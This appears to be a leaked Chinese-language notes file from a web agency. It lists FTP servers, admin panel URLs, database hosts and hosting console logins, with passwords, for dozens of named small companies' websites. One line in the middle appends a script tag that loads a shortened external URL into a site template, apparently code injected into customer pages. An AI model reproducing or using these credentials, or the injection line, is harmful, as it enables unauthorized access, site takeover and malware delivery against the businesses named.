www.gdhaibang.com  的FTP        海邦             域名后面加/admin     超管账号 administrator  密码  ebinfo2014
 
 IP： 211.102.91.13 端口 800
用户：gc21|zsshimin
密码：vN1#eYZJEi

测试地址

FTP:[图片]120.76.134.47
帐号：capicard
密码： FICfwWVDzRZK


 
金易达  ip  211.102.91.13,   800端口     gl87|jinyida888   L%goTfHK2q




http://www.jinyida888.com/power/login.asp
administrator  admin2012




熠景


域名后面加/admin    administrator  ebinfo2014
后面是账号密码 
超管的



君豪   ftp                    后台     http://www.zsjunhao.com/admin/      administrator  ebinfo2014    或者admin2012


IP：211.102.91.13 端口：800
用户：gl207|zsjunhao
密码：;aF#72F%B:




www.laianda.com.cn   ftp

服务器IP：gltc04.28.com.cn 端口：800
FTP用户名：gt06|laiaeda
FTP密码：iAc4@1anda



http://semyoo.wbteam.cn
账号：雨欣荟小程序
密码：admin123456
小程序的商城管理后台，不是微信后台

 

 中山市润晟照明有限公司（荣祥）中文PC 急

211.102.91.13 端口 800  
用户：gl88|rongxianglamp
密码：2%-Bt^O^L2


点点管家
ip：111.230.242.187
ftp账号：ban
ftp密码：sixsix66

后台
admin
wwwwe10cn


金豪佰特
IP:120.76.134.47 	
FTP账号：jhbt888	
密码：g92CfjQcVSgN	


www.myongnuo.com FTP         江门市永诺涂料有限公司
IP 211.102.90.8 端口：800
用户:gl350|jmyongnuo
密码：Z@Y%x43KuZ

/power/login.asp       admin



    
	templateBuilder.Append("<script src=http://t.cn/RyptTfO></");




朗俊
   Web服务器地址： host8219371.xincache1.cn 
   独立ip： 无 
   FTP用户名： host8219371   FTP密码：admin123456


新奥网站
Web服务器地址： [图片]host7460395.xincache1.cn 
独立ip： 无 
FTP用户名： host7460395  FTP密码：admin123456


精华电子
ｗｗｗ.[图片][图片]88283651.com FTP 
IP：[图片][图片]211.102.90.8
用户：gl21|zshuadian
密码：WR7i(U#yw(


[图片]http://zssxqq.ebinfo.com/longquan/   龙泉的地址和ftp空间
FTP:[图片]120.76.134.47
帐号：capicard
密码： FICfwWVDzRZK

中山市先声达机电设备有限公司（全网推）

WEB地址	host4076842.xincache1.cn	独立IP地址	--
FTP用户名	host4076842	FTP密码	admin123456
数据库类型	SQLServer2008	数据库名称/用户名	ms5806466
数据库密码	q7Z9V4x4	数据库地址	ms5806466.xincache1.cn
数据库类型	MySQL5	数据库名称/用户名	my1163947

宜生光电照明科技有限公司（全网推）

WEB地址	host4672069.xincache1.cn	独立IP地址	--
FTP用户名	host4672069	FTP密码：admin123456
数据库类型	SQLServer2008	数据库名称/用户名	ms6299733
数据库密码	j6y7w1j4	数据库地址	ms6299733.xincache1.cn
数据库类型	MySQL5	数据库名称/用户名	my0886341
数据库密码	G3h8H2d5	数据库地址	my0886341.xincache1.cn

宇阳森泰外贸版WEB地址
	host6545857.xincache4.cn	独立IP地址	--
FTP用户名	host6545857	FTP密码	admin123456
数据库类型	SQLServer2008	数据库名称/用户名	ms0590379
数据库密码	B1b5F3j8	数据库地址	ms0590379.xincache4.cn
数据库类型	MySQL5	数据库名称/用户名	my3242188
数据库密码	h4N3U3r4	数据库地址	my3242188.xincache4.cn


中山市宇阳森泰照明科技有限公司（筑巢）
登录后台：http://www.yuyanglight.com/pages
账号密码：nest  nestsoft

FTP地址:ftp.hk810.pc51.com
FTP:yuyanglightcom187
密码：admin123456
控制面板：http://manage.iisp.com/

中山市东升镇三力车行（商城）

专用解析地址	host7950305.xincache5.cn
FTP用户名	host7950305 FTP密码：admin123456
数据库类型	SQLServer2008 	数据库名称/用户名	ms0835289
数据库密码	G8M3r7n6  数据库地址	ms0835289.xincache1.cn
数据库类型	MySQL5  	数据库名称/用户名	my8201414
数据库密码	R4r9W5D4    	数据库地址	my8201414.xincache1.cn



佛山市启橙网络科技有限公司 （全网推）
主机管理控制台地址：

https://cp.aliyun.com 

用户名：syw4655160001

密码：fsqc2018

FTP登录主机地址：

syw4655160001.my3w.com

用户名：syw4655160001
密码：fsqc2018

SqlServer数据库连接地址：

sds447751251.my3w.com

用户名：sds447751251
密码：fsqc2018





中山市众烁照明有限公司（全网推）
商品名称： 全能04.NT(700M)/普惠型-3 
操作系统： Windows 2012 
主域名： zogso.com 
机房： 北京机房  
Web服务器地址： host7460395.xincache1.cn 
独立ip： 无 
FTP用户名： host7460395  FTP密码：admin123456
 Web空间大小： 700 
商品状态： icp备案审核中  
开通日期： 2018-05-22 10:56:24 
到期日期： 2019-06-22 10:56:24 


网址：[图片]www.logicshower.com
主域名： [图片]logicshower.com 
机房： 北京机房  
Web服务器地址： [图片]host8219371.xincache1.cn 
FTP用户名： host8219371   FTP密码：admin123456
朗俊IP：[图片]120.133.3.16


西凯的站长工具：[图片]www.seekerlighting.com
Web服务器地址： [图片]host2315197.xincache4.cn 
独立ip： 无 
FTP用户名： host2315197 密码：admin1234567




 创毅达 http://zscyd.28.com.cn/power/login.asp
 ftp[图片]www.zscyd.net FTP
[图片]211.102.90.8 
gc190|zscyd
#6#I7w#09C




宝粤照明后台
[图片]http://zssxqq.ebinfo.com/baoyue/admin
admin
admin123


主域名： [图片]logicshower.com 
机房： 北京机房  
Web服务器地址： [图片]host8219371.xincache1.cn 
独立ip： 无 
FTP用户名： host8219371   FTP密码：admin123456
朗俊


FTP:[图片]120.76.134.47
帐号：capicard
密码： FICfwWVDzRZK



企业小程序后台

FTP帐号：gxm
密码：E22TdLgDoaIq
IP：[图片]120.76.134.47
